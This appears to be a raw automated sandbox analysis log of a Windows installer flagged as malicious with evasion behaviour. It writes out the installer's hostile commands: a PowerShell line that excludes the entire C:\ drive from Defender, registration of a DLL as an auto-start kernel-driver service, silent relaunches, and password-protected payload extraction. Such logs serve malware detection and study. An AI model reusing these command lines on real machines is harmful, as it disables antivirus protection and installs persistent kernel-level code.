Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: String function: 6C856F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: String function: 6C7B9240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00891E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 008928E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 0092FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007EFEA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000000.2048989739.0000000000E09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.000000000373E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.8.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@128/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C785D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C785D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00899313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00899313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_008A3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_008A3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00899252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00899252
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpCode function: 6_2_6C785240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C785240
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile created: C:\Program Files (x86)\Windows NT\is-P7QVT.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6584:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6176:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5616:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe"
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
